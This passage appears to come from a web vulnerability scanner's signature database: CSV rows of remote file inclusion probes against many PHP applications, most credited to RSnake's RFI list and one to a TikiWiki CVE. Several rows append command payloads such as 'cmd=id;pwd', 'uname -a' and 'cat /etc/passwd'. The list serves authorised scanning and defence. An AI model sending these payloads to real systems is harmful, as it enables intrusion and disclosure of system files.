"005881","https://gist.github.com/mubix/5d269c686584875015a2","c","/studip-1.3.0-2/studip-htdocs/archiv_assi.php?cmd=ls%20-al&ABSOLUTE_PATH_STUDIP=@RFIURL?","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005882","https://gist.github.com/mubix/5d269c686584875015a2","c","/studip-1.3.0-2/studip-phplib/oohforms.inc?cmd=ls%20-al&_PHPLIB[libdir]=@RFIURL?","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005883","https://gist.github.com/mubix/5d269c686584875015a2","c","/styles.php?toroot=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005884","https://gist.github.com/mubix/5d269c686584875015a2","c","/styles/default/global_header.php?installed=23&domain=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005885","https://gist.github.com/mubix/5d269c686584875015a2","c","/submit_abuse.php?path_prefix=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005886","https://gist.github.com/mubix/5d269c686584875015a2","c","/submit_comment.php?path_prefix=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005887","https://gist.github.com/mubix/5d269c686584875015a2","c","/subscp.php?phpbb_root_path=@RFIURL?","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005888","https://gist.github.com/mubix/5d269c686584875015a2","c","/suite/index.php?pg=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005889","https://gist.github.com/mubix/5d269c686584875015a2","c","/suite/index.php?pg=@RFIURL?","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005890","https://gist.github.com/mubix/5d269c686584875015a2","c","/supasite/admin_auth_cookies.php?supa[db_path]=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005891","https://gist.github.com/mubix/5d269c686584875015a2","c","/supasite/admin_mods.php?supa[db_path]=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005892","https://gist.github.com/mubix/5d269c686584875015a2","c","/supasite/admin_news.php?supa[db_path]=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005893","https://gist.github.com/mubix/5d269c686584875015a2","c","/supasite/admin_settings.php?supa[include_path]=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005894","https://gist.github.com/mubix/5d269c686584875015a2","c","/supasite/admin_topics.php?supa[db_path]=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005895","https://gist.github.com/mubix/5d269c686584875015a2","c","/supasite/admin_users.php?supa[db_path]=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005896","https://gist.github.com/mubix/5d269c686584875015a2","c","/supasite/admin_utilities.php?supa[db_path]=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005897","https://gist.github.com/mubix/5d269c686584875015a2","c","/supasite/backend_site.php?supa[include_path]=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005898","https://gist.github.com/mubix/5d269c686584875015a2","c","/supasite/common_functions.php?supa[db_path]=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005899","https://gist.github.com/mubix/5d269c686584875015a2","c","/supasite/site_comment.php?supa[db_path]=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005900","https://gist.github.com/mubix/5d269c686584875015a2","c","/supasite/site_news.php?supa[db_path]=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005901","https://gist.github.com/mubix/5d269c686584875015a2","c","/support/include/open_form.php?include_dir=@RFIURL?cmd=pwd","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005902","https://gist.github.com/mubix/5d269c686584875015a2","c","/support/index.php?main=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005903","https://gist.github.com/mubix/5d269c686584875015a2","c","/surveys/survey.inc.php?path=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005904","https://gist.github.com/mubix/5d269c686584875015a2","c","/sw/lib_comment/comment.php?doc_directory=@RFIURL?","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005905","https://gist.github.com/mubix/5d269c686584875015a2","c","/sw/lib_find/find.php?doc_directory=@RFIURL?","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005906","https://gist.github.com/mubix/5d269c686584875015a2","c","/sw/lib_session/session.php?doc_directory=@RFIURL?","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005907","https://gist.github.com/mubix/5d269c686584875015a2","c","/sw/lib_up_file/file.php?doc_directory=@RFIURL?","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005908","https://gist.github.com/mubix/5d269c686584875015a2","c","/sw/lib_up_file/find_file.php?doc_directory=@RFIURL?","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005909","https://gist.github.com/mubix/5d269c686584875015a2","c","/sw/lib_user/find_user.php?doc_directory=@RFIURL?","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005910","https://gist.github.com/mubix/5d269c686584875015a2","c","/sw/lib_user/user.php?doc_directory=@RFIURL?","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005911","https://gist.github.com/mubix/5d269c686584875015a2","c","/sys/code/box.inc.php?config[\"sipssys\"]=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005912","https://gist.github.com/mubix/5d269c686584875015a2","c","/system/ImageImageMagick.php?glConf[path_system]=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005913","https://gist.github.com/mubix/5d269c686584875015a2","c","/system/ImageImageMagick.php?glConf[path_system]=@RFIURL?","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005914","https://gist.github.com/mubix/5d269c686584875015a2","c","/system/_b/contentFiles/gBIndex.php?gBRootPath=@RFIURL?","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005915","https://gist.github.com/mubix/5d269c686584875015a2","c","/system/admin/include/item_main.php?GLOBALS=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005916","https://gist.github.com/mubix/5d269c686584875015a2","c","/system/admin/include/upload_form.php?GLOBALS=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005917","https://gist.github.com/mubix/5d269c686584875015a2","c","/system/command/admin.cmd.php?GLOBALS=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005918","https://gist.github.com/mubix/5d269c686584875015a2","c","/system/command/download.cmd.php?GLOBALS=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005919","https://gist.github.com/mubix/5d269c686584875015a2","c","/system/funcs/xkurl.php?PEARPATH=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005920","https://gist.github.com/mubix/5d269c686584875015a2","c","/system/includes/pageheaderdefault.inc.php?_sysSessionPath=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005921","https://gist.github.com/mubix/5d269c686584875015a2","c","/system/login.php?site_path=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005922","https://gist.github.com/mubix/5d269c686584875015a2","c","/tagit2b/tagmin/delTagUser.php?configpath=@RFIURL?","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005923","https://gist.github.com/mubix/5d269c686584875015a2","c","/tags.php?BBCodeFile=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005924","https://gist.github.com/mubix/5d269c686584875015a2","c","/taxonservice.php?dir=@RFIURL?","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005925","https://gist.github.com/mubix/5d269c686584875015a2","c","/teatro/pub/pub08_comments.php?basePath=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005926","https://gist.github.com/mubix/5d269c686584875015a2","c","/technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=@RFIURL?","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005927","https://gist.github.com/mubix/5d269c686584875015a2","c","/template.php?actionsPage=@RFIURL?","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005928","https://gist.github.com/mubix/5d269c686584875015a2","c","/template.php?blog_theme=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005929","https://gist.github.com/mubix/5d269c686584875015a2","c","/template.php?pagina=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005930","https://gist.github.com/mubix/5d269c686584875015a2","c","/template/Noir/index.php?site_path=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005931","https://gist.github.com/mubix/5d269c686584875015a2","c","/template/Vert/index.php?pageAll=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005932","https://gist.github.com/mubix/5d269c686584875015a2","c","/template/Vert/index.php?site_path=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005933","https://gist.github.com/mubix/5d269c686584875015a2","c","/template/barnraiser_01/p_new_password.tpl.php?templatePath=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005934","https://gist.github.com/mubix/5d269c686584875015a2","c","/template/default/footer.php?ROOT_PATH=@RFIURL?cmd=ls","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005935","https://gist.github.com/mubix/5d269c686584875015a2","c","/template/default/test/header.php?ROOT_PATH=@RFIURL?cmd=ls","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005936","https://gist.github.com/mubix/5d269c686584875015a2","c","/template/gwb/user_bottom.php?config[template_path]=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005937","https://gist.github.com/mubix/5d269c686584875015a2","c","/template/purpletech/base_include.php?page=@RFIURL?","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005938","https://gist.github.com/mubix/5d269c686584875015a2","c","/template/rwb/user_bottom.php?config[template_path]=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005939","https://gist.github.com/mubix/5d269c686584875015a2","c","/template/rwb/user_bottom.php?config[template_path]=@RFIURL?&cmd=ls","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005940","https://gist.github.com/mubix/5d269c686584875015a2","c","/template_csv.php?rInfo[content]=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005941","https://gist.github.com/mubix/5d269c686584875015a2","c","/templates/2blue/bodyTemplate.php?serverPath=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005942","https://gist.github.com/mubix/5d269c686584875015a2","c","/templates/2blue/bodyTemplate.php?serverPath=@RFIURL?","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005943","https://gist.github.com/mubix/5d269c686584875015a2","c","/templates/Official/part_userprofile.php?template_path=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005944","https://gist.github.com/mubix/5d269c686584875015a2","c","/templates/barrel/template.tpl.php?renderer=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005945","https://gist.github.com/mubix/5d269c686584875015a2","c","/templates/barrel/template.tpl.php?renderer=@RFIURL?","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005946","https://gist.github.com/mubix/5d269c686584875015a2","c","/templates/barry/template.tpl.php?renderer=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005947","https://gist.github.com/mubix/5d269c686584875015a2","c","/templates/be2004-2/index.php?mosConfig_absolute_path=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005948","https://gist.github.com/mubix/5d269c686584875015a2","c","/templates/datumVonDatumBis.inc.php?root=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005949","https://gist.github.com/mubix/5d269c686584875015a2","c","/templates/default/header.inc.php?menu=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005950","https://gist.github.com/mubix/5d269c686584875015a2","c","/templates/default/index_logged.php?main_loaded=1&cur_module=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005951","https://gist.github.com/mubix/5d269c686584875015a2","c","/templates/default/tpl_message.php?right_file=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005952","https://gist.github.com/mubix/5d269c686584875015a2","c","/templates/footer.inc.php?root=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005953","https://gist.github.com/mubix/5d269c686584875015a2","c","/templates/header.inc.php?root=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005954","https://gist.github.com/mubix/5d269c686584875015a2","c","/templates/mylook/template.tpl.php?renderer=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005955","https://gist.github.com/mubix/5d269c686584875015a2","c","/templates/oerdec/template.tpl.php?renderer=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005956","https://gist.github.com/mubix/5d269c686584875015a2","c","/templates/pb/language/lang_nl.php?temppath=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005957","https://gist.github.com/mubix/5d269c686584875015a2","c","/templates/penguin/template.tpl.php?renderer=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005958","https://gist.github.com/mubix/5d269c686584875015a2","c","/templates/sidebar/template.tpl.php?renderer=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005959","https://gist.github.com/mubix/5d269c686584875015a2","c","/templates/slashdot/template.tpl.php?renderer=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005960","https://gist.github.com/mubix/5d269c686584875015a2","c","/templates/stylesheets.php?root=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005961","https://gist.github.com/mubix/5d269c686584875015a2","c","/templates/text-only/template.tpl.php?renderer=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005962","https://gist.github.com/mubix/5d269c686584875015a2","c","/templates/tmpl_dfl/scripts/index.php?dir[inc]=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005963","https://gist.github.com/mubix/5d269c686584875015a2","c","/theme/breadcrumb.php?rootBase=@RFIURL?","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005964","https://gist.github.com/mubix/5d269c686584875015a2","c","/theme/default.php?root=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005965","https://gist.github.com/mubix/5d269c686584875015a2","c","/theme/format.php?_page_content=@RFIURL?","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005966","https://gist.github.com/mubix/5d269c686584875015a2","c","/theme/format.php?_page_css=@RFIURL?","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005967","https://gist.github.com/mubix/5d269c686584875015a2","c","/theme/frames1.php?root=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005968","https://gist.github.com/mubix/5d269c686584875015a2","c","/theme/frames1_center.php?root=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005969","https://gist.github.com/mubix/5d269c686584875015a2","c","/theme/frames1_left.php?root=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005970","https://gist.github.com/mubix/5d269c686584875015a2","c","/theme/frames1_top.php?root=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005971","https://gist.github.com/mubix/5d269c686584875015a2","c","/theme/phpAutoVideo/LightTwoOh/sidebar.php?loadpage=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005972","https://gist.github.com/mubix/5d269c686584875015a2","c","/theme/settings.php?pfad_z=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005973","https://gist.github.com/mubix/5d269c686584875015a2","c","/theme/test1.php?root=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005974","https://gist.github.com/mubix/5d269c686584875015a2","c","/theme/test2.php?root=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005975","https://gist.github.com/mubix/5d269c686584875015a2","c","/theme/test3.php?root=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005976","https://gist.github.com/mubix/5d269c686584875015a2","c","/theme/test4.php?root=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005977","https://gist.github.com/mubix/5d269c686584875015a2","c","/theme/test5.php?root=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005978","https://gist.github.com/mubix/5d269c686584875015a2","c","/theme/test6.php?root=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005979","https://gist.github.com/mubix/5d269c686584875015a2","c","/themes.php?GLOBALS[theme_path]=@RFIURL?","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005980","https://gist.github.com/mubix/5d269c686584875015a2","c","/themes/blackorange.php?root=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005981","https://gist.github.com/mubix/5d269c686584875015a2","c","/themes/container.php?theme_directory=@RFIURL%00","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005982","https://gist.github.com/mubix/5d269c686584875015a2","c","/themes/default/layouts/standard.php?page_include=@RFIURL?&act=cmd&cmd=whoami&d=/&submit=1&cmd_txt=1","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005983","https://gist.github.com/mubix/5d269c686584875015a2","c","/themes/default/preview_post_completo.php?dir=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005984","https://gist.github.com/mubix/5d269c686584875015a2","c","/themes/header.php?theme_directory=@RFIURL%00","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005985","https://gist.github.com/mubix/5d269c686584875015a2","c","/themes/ubb/login.php?theme=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005986","https://gist.github.com/mubix/5d269c686584875015a2","c","/themes/ubb/login.php?theme=@RFIURL?","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005987","https://gist.github.com/mubix/5d269c686584875015a2","c","/thumbnail.php?module=gallery&GLOBALS[PTH][classes]=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005988","CVE-2007-5423","c","/tikiwiki/tiki-graph_formula.php?w=1&h=1&s=1&min=1&max=2&f[]=x.tan.phpinfo()&t=png&title=@RFIURL","GET","PHP Version","","","","","TikiWiki contains a vulnerability which allows remote attackers to execute arbitrary PHP code.","","" "005989","https://gist.github.com/mubix/5d269c686584875015a2","c","/timedifference.php?la=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005990","https://gist.github.com/mubix/5d269c686584875015a2","c","/toolbar.loudmouth.php?mainframe=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005991","https://gist.github.com/mubix/5d269c686584875015a2","c","/tools/update_translations.php?_SESSION[path]=@RFIURL?","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005992","https://gist.github.com/mubix/5d269c686584875015a2","c","/top.php?laypath=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005993","https://gist.github.com/mubix/5d269c686584875015a2","c","/toplist.php?f=toplist_top10&phpbb_root_path=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005994","https://gist.github.com/mubix/5d269c686584875015a2","c","/topsites/index.php?page=@RFIURL?&cmd=uname%20-a","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005995","https://gist.github.com/mubix/5d269c686584875015a2","c","/towels-0.1/src/scripture.php?pageHeaderFile=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005996","https://gist.github.com/mubix/5d269c686584875015a2","c","/track.php?path=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005997","https://gist.github.com/mubix/5d269c686584875015a2","c","/tsep/include/colorswitch.php?tsep_config[absPath]=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005998","https://gist.github.com/mubix/5d269c686584875015a2","c","/tsep/include/colorswitch.php?tsep_config[absPath]=@RFIURL?","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005999","https://gist.github.com/mubix/5d269c686584875015a2","c","/ttCMS_path/lib/db/ez_sql.php?lib_path=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "006000","https://gist.github.com/mubix/5d269c686584875015a2","c","/twebs/modules/misc/usermods.php?ROOT=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "006001","https://gist.github.com/mubix/5d269c686584875015a2","c","/ubbt.inc.php?GLOBALS[thispath]=@RFIURL?","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "006002","https://gist.github.com/mubix/5d269c686584875015a2","c","/unavailable.php?bibtexrootrel=@RFIURL?","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "006003","https://gist.github.com/mubix/5d269c686584875015a2","c","/unsubs.php?scdir=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "006004","https://gist.github.com/mubix/5d269c686584875015a2","c","/up.php?my[root]=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "006005","https://gist.github.com/mubix/5d269c686584875015a2","c","/upload.php?save_path=@RFIURL?","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "006006","https://gist.github.com/mubix/5d269c686584875015a2","c","/upload/admin/frontpage_right.php?loadadminpage=@RFIURL?","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "006007","https://gist.github.com/mubix/5d269c686584875015a2","c","/upload/top.php?maindir=@RFIURL?","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "006008","https://gist.github.com/mubix/5d269c686584875015a2","c","/upload/xax/admin/modules/install_module.php?level=@RFIURL?","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "006009","https://gist.github.com/mubix/5d269c686584875015a2","c","/upload/xax/admin/patch/index.php?level=@RFIURL?","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "006010","https://gist.github.com/mubix/5d269c686584875015a2","c","/upload/xax/ossigeno/admin/install_module.php?level=@RFIURL?","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "006011","https://gist.github.com/mubix/5d269c686584875015a2","c","/upload/xax/ossigeno/admin/uninstall_module.php?level=@RFIURL?","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "006012","https://gist.github.com/mubix/5d269c686584875015a2","c","/upload_local.php?target=@RFIURL?","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "006013","https://gist.github.com/mubix/5d269c686584875015a2","c","/upload_multi.php?target=@RFIURL?","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "006014","https://gist.github.com/mubix/5d269c686584875015a2","c","/urlinn_includes/config.php?dir_ws=@RFIURL?","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "006015","https://gist.github.com/mubix/5d269c686584875015a2","c","/user.php?caselist[bad_file.txt][path]=@RFIURL&command=cat%20/etc/passwd","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "006016","https://gist.github.com/mubix/5d269c686584875015a2","c","/user_language.php?INDM=r3d.w0rm&language_dir=@RFIURL?","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "006017","https://gist.github.com/mubix/5d269c686584875015a2","c","/user_new_2.php?home=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "006018","https://gist.github.com/mubix/5d269c686584875015a2","c","/usr/extensions/get_calendar.inc.php?root_path=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "006019","https://gist.github.com/mubix/5d269c686584875015a2","c","/usr/extensions/get_infochannel.inc.php?root_path=@RFIURL?cmd=id;pwd","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "006020","https://gist.github.com/mubix/5d269c686584875015a2","c","/usr/extensions/get_tree.inc.php?GLOBALS[\"root_path\"]=@RFIURL?cmd=id;pwd","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "006021","https://gist.github.com/mubix/5d269c686584875015a2","c","/usr/extensions/get_tree.inc.php?GLOBALS[root_path]=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "006022","https://gist.github.com/mubix/5d269c686584875015a2","c","/utilitaires/gestion_sondage.php?repertoire_visiteur=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "006023","https://gist.github.com/mubix/5d269c686584875015a2","c","/utilitaires/gestion_sondage.php?repertoire_visiteur=@RFIURL?&cmd=ls","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "006024","https://gist.github.com/mubix/5d269c686584875015a2","c","/utils/class_HTTPRetriever.php?libcurlemuinc=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "006025","https://gist.github.com/mubix/5d269c686584875015a2","c","/v-webmail/includes/mailaccess/pop3.php?CONFIG[pear_dir]=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "006026","https://gist.github.com/mubix/5d269c686584875015a2","c","/vCard/admin/define.inc.php?match=@RFIURL?&cmd=id","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "006027","https://gist.github.com/mubix/5d269c686584875015a2","c","/vb/includes/functions.php?classfile=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "006028","https://gist.github.com/mubix/5d269c686584875015a2","c","/vb/includes/functions_cron.php?nextitem=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "006029","https://gist.github.com/mubix/5d269c686584875015a2","c","/vb/includes/functions_forumdisplay.php?specialtemplates=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "006030","https://gist.github.com/mubix/5d269c686584875015a2","c","/vbgsitemap/vbgsitemap-config.php?base=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "006031","https://gist.github.com/mubix/5d269c686584875015a2","c","/vbgsitemap/vbgsitemap-vbseo.php?base=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "006032","https://gist.github.com/mubix/5d269c686584875015a2","c","/vedit/editor/edit_htmlarea.php?highlighter=@RFIURL?","GET","PHP 